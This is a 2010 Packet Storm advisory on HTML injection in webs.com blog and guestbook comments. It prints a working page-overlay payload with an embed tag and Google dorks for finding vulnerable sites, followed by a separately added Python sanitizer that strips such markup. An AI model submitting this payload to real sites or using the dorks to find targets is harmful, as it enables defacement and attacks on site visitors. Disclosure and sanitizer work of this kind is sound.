Free Website Creator Cross Site Scripting

2010-05-10T00:00:00
ID PACKETSTORM:89312
Type packetstorm
Reporter isoz
Modified 2010-05-10T00:00:00

Description

                                        
# Exploit Title: webs.com Free Website Creator APPs XSS/HTML Injection  
# Date: 8/5/2010  
# Author: isoz - http://bioworm.org/forum  
# Software Link: http://webs.com  
# Version: Any  
# Tested on: Any OS  
# CVE : -  
# Code : [Example:]  
  
Description:  
Webs helps you make your own free website. Personal, group, and small  
business websites complete with photos, videos, and ecommerce.  
  
  
POC:  
Go to a blog or guestbook and submit the example code in the comment  
form.  
  
Example:  
<div style='top:0px;position:absolute;left:0px;width:  
900px;height:1800px;background-color:#000000;color:#FFFF00;text-align:  
center;'>  
  
<embed src="evil">  
  
  
  
Dorks:  
inurl:"webs.com/apps/blog"  
inurl:"webs.com/apps/guestbook"  
  
350,000+ results  
  
Greetz:  
JMADD ;)  
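
Mitigation sketch, added here and not part of the original advisory or of webs.com's code: an allow-list sanitizer for comment bodies that drops the `div`/`style` overlay and the `embed` tag used in the example above. The tag policy, the names `CommentSanitizer`, `sanitize_comment` and `safe_href`, and the benign text appended to the sample are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed comment policy: a few inline tags, no attributes except a checked href.
ALLOWED_TAGS = {"b", "i", "em", "strong", "a", "p", "br"}
SAFE_SCHEMES = {"http", "https"}

def safe_href(href):
    try:
        return urlsplit(href).scheme.lower() in SAFE_SCHEMES
    except ValueError:  # malformed URL
        return False

class CommentSanitizer(HTMLParser):
    """Rebuild a comment from parsed tokens, keeping only allow-listed markup."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags = [], []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # div, embed, script, iframe and the rest are dropped
        href = (dict(attrs).get("href") or "").strip()
        kept = ""
        if tag == "a" and safe_href(href):
            kept = ' href="%s" rel="nofollow noopener"' % escape(href, quote=True)
        # style, on* handlers and every other attribute are never copied
        self.out.append("<%s%s>" % (tag, kept))
        if tag != "br":
            self.open_tags.append(tag)
    def handle_endtag(self, tag):
        while tag in self.open_tags:  # also closes tags nested inside it
            closing = self.open_tags.pop()
            self.out.append("</%s>" % closing)
            if closing == tag:
                break
    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize_comment(raw):
    parser = CommentSanitizer()
    parser.feed(raw)
    parser.close()
    parser.out.extend("</%s>" % t for t in reversed(parser.open_tags))
    return "".join(parser.out)

# The advisory's example markup followed by constructed benign text.
SAMPLE = ("<div style='top:0px;position:absolute;left:0px;width:900px;height:1800px;"
          "background-color:#000000;color:#FFFF00;text-align:center;'>"
          "<embed src=\"evil\">Nice <b>post</b>!")
```

The sanitizer belongs on the server at the point where the comment is stored or rendered; a Content-Security-Policy that restricts `object-src` limits what an `embed` that slips through can load.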
  
  
  